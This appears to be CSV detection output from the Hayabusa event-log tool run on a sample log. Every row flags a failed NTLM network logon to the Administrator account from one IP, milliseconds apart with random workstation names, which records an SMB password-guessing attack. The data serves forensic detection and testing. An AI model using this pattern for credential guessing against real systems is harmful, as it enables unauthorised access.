2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sAW1YzCQ3CreseaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhqBirEHOKPepR3n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uqSFXpzAWOnc90n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: McbeS9lRpbMc48jO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6J0d7dQUmJNKJlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QG3WU91rhTP9odx7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSQRgB8yMfhb03g1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bzbZjRXTc0XvV4Ry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3ShOCSaLGX4YBWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lIrydzi8nmY251Z1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4vlRksTGxAqEt9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJMnD0foEDbcNfTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNWppBJLFojEFtiF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7a9Tvr6ruDpiG2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBNIizCKz2ybc3eM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YwuXQhISpgfSFqZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeONLdrrauxqvgaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RFqSH4toadsTideV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuMa0Juj1tjL6NDY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UA8zU0kJ6gAFqSaF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvX85gF8wk3AGJyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpzOMKQIBrkQW5Os | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqzrLAqHNi4CHT56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HWMap8qHlykO6Yeu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pkc9LWakJBjhBQv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y43cE75gTzA1XjHF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HopaYDAbYxHjJEr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: brNgudTWJaKs8nLd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzPwOqU92kdGodBH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXlzxK5OXL9hpqrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cLdgWvrVh7h2jPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h34xlYavVsXQRCYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6wjflwqXyFzYTi0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlsuCSajqGUYTBWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xQDdrQQZ5xYBDiRi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JX5NMuwUsOZEp3zh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfrbGLqKGru8AE2a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 813natbodi6QauRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KpfKxOZG3xSr5Yqm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErWiEb0USDghXsB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fOWF6YnW8UEPlw41 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SNPXuHduatLFQc8W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 35rfur4MzKzwxCIn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VmAqzaZaeoSjcuh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKuCpuGcGmDOoewr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bz6SOAeTyqsBz6Oa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSURiEoC7dw0w0ru | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDjwkaHT8lrFmn9X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ayI129HgVWA5q4Sk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jT2yiuOJS8Fvf9SD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hpAO2UrjFd6Kxt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZkgGj9Fnqn3XwnBT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFXPYo0yzR7p8dNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9j6MxN7PuM29Vlcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1CWIqoV6GzmmlRm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiBfvnfTcIG4xJoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dED7HYntoE5D7XvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pX1ztnCKiePrPbTT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3XQcfMHJDsBtJDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhRsRIS5tHKLv2oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmkLhptugDU2fDWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2yk62yREbgDCj9pB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6JPvkmaAsJlwn9t3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lhciP1zM9njlRI3j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: duNDenwdo1oHVuoL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0ChBZOYkTm1SguA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RU38tuiKC0weexmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jg0Hp4xtz0pAMhCz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AorVNz5MgTeEvn2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oJ6tVjBxlYyj5ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oEAEOi0TsSRVPlz4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: USfEwKkH8OUADVds | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y0jg1i6tDiInd10i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv2jRzrgoP6lJdAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
